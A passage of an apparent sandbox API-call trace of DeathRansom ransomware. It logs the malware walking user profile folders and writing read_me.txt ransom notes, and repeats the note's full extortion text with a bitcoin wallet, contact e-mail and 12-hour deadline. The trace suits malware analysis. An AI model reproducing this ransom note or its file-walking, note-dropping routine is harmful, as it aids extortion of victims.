FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.271] WriteFile (in: hFile=0x7c8, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17de6c, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17de6c*=0x6b3, lpOverlapped=0x0) returned 1 [0075.272] CloseHandle (hObject=0x7c8) returned 1 [0075.272] GetProcessHeap () returned 0x280000 [0075.272] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8bb0138 | out: hHeap=0x280000) returned 1 [0075.274] lstrcpyW (in: lpString1=0x8b80038, lpString2="\\\\?\\C:\\Users\\Default\\Downloads" | out: lpString1="\\\\?\\C:\\Users\\Default\\Downloads") returned="\\\\?\\C:\\Users\\Default\\Downloads" [0075.274] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 100 [0075.274] QueueUserWorkItem (Function=0x40a710, Context=0x8b80038, Flags=0x0) returned 1 [0075.274] GetProcessHeap () returned 0x280000 [0075.274] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8bb0138 [0075.274] wnsprintfW (in: pszDest=0x8bb0138, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Downloads\\*") returned 32 [0075.274] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Downloads\\*", lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88db32b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b26f8 [0075.278] lstrcpyW (in: lpString1=0x8bb0138, lpString2="\\\\?\\C:\\Users\\Default\\Favorites" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites") returned="\\\\?\\C:\\Users\\Default\\Favorites" [0075.278] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 101 [0075.278] QueueUserWorkItem (Function=0x40a710, Context=0x8bb0138, Flags=0x0) returned 1 [0075.278] GetProcessHeap () returned 0x280000 [0075.278] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8d130f0 [0075.279] wnsprintfW (in: pszDest=0x8d130f0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\*") returned 32 [0075.279] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\*", lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b26f8 [0075.318] lstrcpyW (in: lpString1=0x8d230f8, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Links" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Links") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Links" [0075.318] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 102 [0075.318] QueueUserWorkItem (Function=0x40a710, Context=0x8d230f8, Flags=0x0) returned 1 [0075.318] GetProcessHeap () returned 0x280000 [0075.318] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8d33100 [0075.319] wnsprintfW (in: pszDest=0x8d33100, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\*") returned 38 [0075.319] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\*", lpFindFileData=0x17dc08 | out: lpFindFileData=0x17dc08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfeffd5f0, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b25f8 [0075.320] lstrcpyW (in: lpString1=0x8d33100, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites" [0075.320] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 103 [0075.321] QueueUserWorkItem (Function=0x40a710, Context=0x8d33100, Flags=0x0) returned 1 [0075.321] GetProcessHeap () returned 0x280000 [0075.321] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8d43108 [0075.321] wnsprintfW (in: pszDest=0x8d43108, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\*") returned 51 [0075.322] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x17dc08 | out: lpFindFileData=0x17dc08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b25f8 [0075.580] lstrcpyW (in: lpString1=0x8d43108, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites") returned="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites" [0075.580] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 104 [0075.580] QueueUserWorkItem (Function=0x40a710, Context=0x8d43108, Flags=0x0) returned 1 [0075.580] GetProcessHeap () returned 0x280000 [0075.580] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8d53110 [0075.581] wnsprintfW (in: pszDest=0x8d53110, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\*") returned 45 [0075.581] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\*", lpFindFileData=0x17dc08 | out: lpFindFileData=0x17dc08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b25f8 [0075.696] lstrcpyW (in: lpString1=0x8d130f0, lpString2="\\\\?\\C:\\Users\\Default\\Links" | out: lpString1="\\\\?\\C:\\Users\\Default\\Links") returned="\\\\?\\C:\\Users\\Default\\Links" [0075.696] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 105 [0075.696] QueueUserWorkItem (Function=0x40a710, Context=0x8d130f0, Flags=0x0) returned 1 [0075.696] GetProcessHeap () returned 0x280000 [0075.696] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8d53110 [0075.696] wnsprintfW (in: pszDest=0x8d53110, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\*") returned 28 [0075.696] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Links\\*", lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b26f8 [0075.791] lstrcpyW (in: lpString1=0x8d53110, lpString2="\\\\?\\C:\\Users\\Default\\Local Settings" | out: lpString1="\\\\?\\C:\\Users\\Default\\Local Settings") returned="\\\\?\\C:\\Users\\Default\\Local Settings" [0075.791] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 106 [0075.791] QueueUserWorkItem (Function=0x40a710, Context=0x8d53110, Flags=0x0) returned 1 [0075.791] GetProcessHeap () returned 0x280000 [0075.791] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8d63118 [0075.792] wnsprintfW (in: pszDest=0x8d63118, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Local Settings\\*") returned 37 [0075.792] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Local Settings\\*", lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="RecentPlaces.lnk", cAlternateFileName="\x07")) returned 0xffffffff [0075.792] wnsprintfW (in: pszDest=0x8d63118, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Default\\Local Settings\\read_me.txt") returned 47 [0075.792] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Local Settings\\read_me.txt" (normalized: "c:\\users\\default\\local settings\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7d0 [0075.853] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.853] WriteFile (in: hFile=0x7d0, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e0e4, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17e0e4*=0x6b3, lpOverlapped=0x0) returned 1 [0075.854] CloseHandle (hObject=0x7d0) returned 1 [0075.854] GetProcessHeap () returned 0x280000 [0075.854] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8d63118 | out: hHeap=0x280000) returned 1 [0075.854] lstrcpyW (in: lpString1=0x8d63118, lpString2="\\\\?\\C:\\Users\\Default\\Music" | out: lpString1="\\\\?\\C:\\Users\\Default\\Music") returned="\\\\?\\C:\\Users\\Default\\Music" [0075.854] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 107 [0075.854] QueueUserWorkItem (Function=0x40a710, Context=0x8d63118, Flags=0x0) returned 1 [0075.854] GetProcessHeap () returned 0x280000 [0075.854] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8d73120 [0075.855] wnsprintfW (in: pszDest=0x8d73120, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Music\\*") returned 28 [0075.855] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Music\\*", lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x176a7cf0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x176a7cf0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b26f8 [0075.856] lstrcpyW (in: lpString1=0x8d73120, lpString2="\\\\?\\C:\\Users\\Default\\My Documents" | out: lpString1="\\\\?\\C:\\Users\\Default\\My Documents") returned="\\\\?\\C:\\Users\\Default\\My Documents" [0075.856] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 108 [0075.856] QueueUserWorkItem (Function=0x40a710, Context=0x8d73120, Flags=0x0) returned 1 [0075.856] GetProcessHeap () returned 0x280000 [0075.856] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8d83128 [0075.857] wnsprintfW (in: pszDest=0x8d83128, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\My Documents\\*") returned 35 [0075.857] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\My Documents\\*", lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x176a7cf0, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x176a7cf0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x176a7cf0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="read_me.txt", cAlternateFileName="廠疙ᣜ?\x17甴\x17a")) returned 0xffffffff [0075.857] wnsprintfW (in: pszDest=0x8d83128, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Default\\My Documents\\read_me.txt") returned 45 [0075.857] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\My Documents\\read_me.txt" (normalized: "c:\\users\\default\\my documents\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0075.857] GetProcessHeap () returned 0x280000 [0075.857] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8d83128 | out: hHeap=0x280000) returned 1 [0075.857] lstrcpyW (in: lpString1=0x8d83128, lpString2="\\\\?\\C:\\Users\\Default\\NetHood" | out: lpString1="\\\\?\\C:\\Users\\Default\\NetHood") returned="\\\\?\\C:\\Users\\Default\\NetHood" [0075.857] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 109 [0075.857] QueueUserWorkItem (Function=0x40a710, Context=0x8d83128, Flags=0x0) returned 1 [0075.857] GetProcessHeap () returned 0x280000 [0075.857] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8d93130 [0075.858] wnsprintfW (in: pszDest=0x8d93130, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\NetHood\\*") returned 30 [0075.858] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\NetHood\\*", lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x176a7cf0, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x176a7cf0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x176a7cf0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="read_me.txt", cAlternateFileName="廠疙ᣜ?\x17甴\x17a")) returned 0xffffffff [0075.858] wnsprintfW (in: pszDest=0x8d93130, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Default\\NetHood\\read_me.txt") returned 40 [0075.858] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NetHood\\read_me.txt" (normalized: "c:\\users\\default\\nethood\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7d0 [0075.859] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.859] WriteFile (in: hFile=0x7d0, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e0e4, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17e0e4*=0x6b3, lpOverlapped=0x0) returned 1 [0075.860] CloseHandle (hObject=0x7d0) returned 1 [0075.860] GetProcessHeap () returned 0x280000 [0075.860] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8d93130 | out: hHeap=0x280000) returned 1 [0075.860] lstrcpyW (in: lpString1=0x8d93130, lpString2="\\\\?\\C:\\Users\\Default\\Pictures" | out: lpString1="\\\\?\\C:\\Users\\Default\\Pictures") returned="\\\\?\\C:\\Users\\Default\\Pictures" [0075.860] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 110 [0075.860] QueueUserWorkItem (Function=0x40a710, Context=0x8d93130, Flags=0x0) returned 1 [0075.861] GetProcessHeap () returned 0x280000 [0075.861] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8da3138 [0075.861] wnsprintfW (in: pszDest=0x8da3138, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Pictures\\*") returned 31 [0075.861] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Pictures\\*", lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x176a7cf0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x176a7cf0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b26f8 [0075.862] lstrcpyW (in: lpString1=0x8da3138, lpString2="\\\\?\\C:\\Users\\Default\\PrintHood" | out: lpString1="\\\\?\\C:\\Users\\Default\\PrintHood") returned="\\\\?\\C:\\Users\\Default\\PrintHood" [0075.862] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 111 [0075.862] QueueUserWorkItem (Function=0x40a710, Context=0x8da3138, Flags=0x0) returned 1 [0075.862] GetProcessHeap () returned 0x280000 [0075.862] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8db3140 [0075.863] wnsprintfW (in: pszDest=0x8db3140, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\PrintHood\\*") returned 32 [0075.863] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\PrintHood\\*", lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x176a7cf0, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x176a7cf0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x176a7cf0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="read_me.txt", cAlternateFileName="廠疙ᣜ?\x17甴\x17a")) returned 0xffffffff [0075.863] wnsprintfW (in: pszDest=0x8db3140, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Default\\PrintHood\\read_me.txt") returned 42 [0075.863] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\PrintHood\\read_me.txt" (normalized: "c:\\users\\default\\printhood\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7d0 [0075.864] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: 